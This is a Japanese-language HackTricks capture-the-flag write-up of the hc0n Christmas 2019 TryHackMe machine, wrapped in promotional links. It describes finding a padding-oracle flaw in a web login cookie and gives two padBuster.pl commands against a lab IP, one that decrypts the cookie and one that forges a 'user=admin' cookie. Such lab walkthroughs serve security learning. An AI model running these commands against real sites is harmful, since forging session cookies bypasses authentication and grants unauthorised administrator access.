hacktricks/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md

hc0n クリスマス CTF - 2019

☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricks で会社を宣伝してみたいですか？または、PEASS の最新バージョンにアクセスしたり、HackTricks を PDF でダウンロードしたいですか？SUBSCRIPTION PLANS をチェックしてください！
• The PEASS Family を発見し、独占的な NFTs のコレクションを見つけてください
• 公式の PEASS & HackTricks スワッグ を手に入れましょう
• 💬 Discord グループに参加するか、telegram グループに参加するか、Twitterで**🐦@carlospolopm をフォロー**してください。
• ハッキングトリックを共有するために、hacktricks リポジトリ と hacktricks-cloud リポジトリ に PR を提出してください。

列挙

私はツール Legionを使用してマシンを列挙し始めました：

2 つのポートが開いています: 80 (HTTP) と 22 (SSH)

Web ページでは新しいユーザーを登録することができ、クッキーの長さが指定されたユーザー名の長さに依存することに気づきました：

そして、クッキーのいくつかのバイトを変更すると、このエラーが表示されます：

この情報とパディングオラクル脆弱性の読み取りにより、それを悪用することができました：

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"

ユーザーadminを設定します:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝してみたいですか？または、PEASSの最新バージョンにアクセスしたいですか？または、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見つけてください
• 公式PEASS＆HackTricks swagを手に入れましょう
• 💬 Discordグループに参加するか、telegramグループに参加するか、Twitterで🐦@carlospolopmをフォローしてください。
• **hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出して、あなたのハッキングトリックを共有してください。